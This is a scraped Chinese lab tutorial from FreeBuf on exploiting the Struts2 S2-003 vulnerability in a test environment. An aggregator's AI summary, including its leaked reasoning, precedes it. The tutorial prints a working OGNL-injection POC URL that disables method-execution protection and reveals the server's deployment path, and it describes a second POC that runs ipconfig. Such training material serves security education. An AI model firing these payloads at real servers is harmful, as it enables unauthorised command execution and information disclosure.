Struts2框架漏洞
嗯,用户让我帮忙总结一篇文章的内容,控制在一百个字以内。首先,我需要仔细阅读这篇文章,了解它的主要内容和重点。 文章看起来是关于Struts2框架的漏洞利用实验。实验的目的是使用POC来利用Struts-S2-003漏洞,获取站点框架部署信息。知识点包括Struts2和POC。实验原理部分提到Struts2是一个基于MVC的Web框架,而Struts-S2-003漏洞允许绕过参数拦截器的保护,操纵服务器端上下文对象。 接下来是实验设备和拓扑结构,使用两台Windows 2008主机,分别作为攻击端和目标主机。实验步骤详细描述了如何登录主机、启动Tomcat服务、使用Firefox浏览器访问目标网站,并通过构造POC来执行命令,获取IP信息和部署路径。 用户的要求是用中文总结内容,控制在100字以内,并且不需要特定的开头。因此,我需要提炼出关键点:实验目的、漏洞名称、利用方法以及结果。 考虑到字数限制,我需要简洁明了地表达这些信息。可能的结构是:描述实验目的、使用的漏洞、利用方式以及结果。 最后,确保语言流畅自然,不使用复杂的术语或过于技术化的表达。 </think> 本文介绍了一个针对Struts-S2-003漏洞的利用实验。通过构造POC(Proof of Concept),成功绕过参数拦截器保护,获取目标站点的部署信息和IP地址等敏感数据。该实验展示了Struts2框架存在的严重安全风险及其潜在危害。 2026-2-2 01:39:4 Author: www.freebuf.com(查看原文) 阅读量:0 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

Struts2框架漏洞

【实验目的】

使用POC分别对Struts-S2-003进行利用,获取站点框架部署信息。

【知识点】

Struts2、POC。

【实验原理】

Struts2是一个基于MVC设计模式的web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器来建立模型与视图的数据交互,相对于其它框架来说,Struts框架是漏洞之王。
Struts-S2-003该漏洞允许恶意用户绕过ParametersInterceptor内置的“#”使用保护,从而能够操纵服务器端上下文对象。

【实验设备】

  • 主机终端: Windows2008主机* 2台

【实验拓扑】

实验拓扑如下图所示。

6406eef5d8f31

【实验思路】

Struts-S2-003利用。

【实验步骤】

1. Struts-S2-003利用

(1) 登录拓扑图右侧的目标主机,账号/密码:administrator/com.1234,双击桌面右下角Tomcat图标,单击Start按钮,再单击【确定】按钮,开启Tomcat服务。如图所示。

image-20240612104425312

(2) 登录拓扑图左侧的攻击端主机,账号/密码:administraotr/com.1234,双击桌面左侧Friefox图标,打开火狐浏览器,访问http://192.168.1.10:8080/struts2-showcase-2.0.1/showcase.action,如图所示。

image-20240612104741487

(3) 利用构造好的POC执行ipconfig命令,查看靶机IP等信息。将以下POC复制到浏览器中进行访问。或者直接将桌面poc.txt文件中的POC1(showcase.action)的内容复制,如图所示。

image-20240612104935402

(3) 在浏览器地址栏中粘贴POC,执行该POC后,弹出【正在打开showcase.action】对话框,选中【保存文件(S)】前的单选按钮,再单击对话框的【确定】按钮,保存至本地,如图所示。

image-20240612105047988

(4) 打开【下载】文件夹,如图所示。右击showcase.action文件,选中【打开方式(H)】→Edit with Notepad++,使用Notepad++打开文件,如图所示。

image-20240612105148080
image-20240612105215456

(5) 如图所示,文件内容包含目标主机的IP等信息。

image-20240612105339121

(6) 或者执行另一种POC,获取部署路径,POC如下:

http://192.168.1.10:8080/struts2-showcase-2.0.1/showcase.action?(b)(('%5C43context[%5C'xwork.MethodAccessor.denyMethodExecution%5C']%5C75false')(b))&(g)(('%5C43req%[email protected]@getRequest()')(d))&(i2)(('%5C43xman%[email protected]@getResponse()')(d))&(i95)(('%5C43xman.getWriter().println(%5C43req.getRealPath(%22\%22))')(d))&(i99)(('%5C43xman.getWriter().close()')(d))

(7) 也可以直接将桌面poc.txt中POC2的内容复制到浏览器中执行,如图所示。

image-20240612105429913

(8) 浏览器返回结果如图所示,返回部署路径。

image-20240612105449974

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/vuls/469154.html
如有侵权请联系:admin#unsafe.sh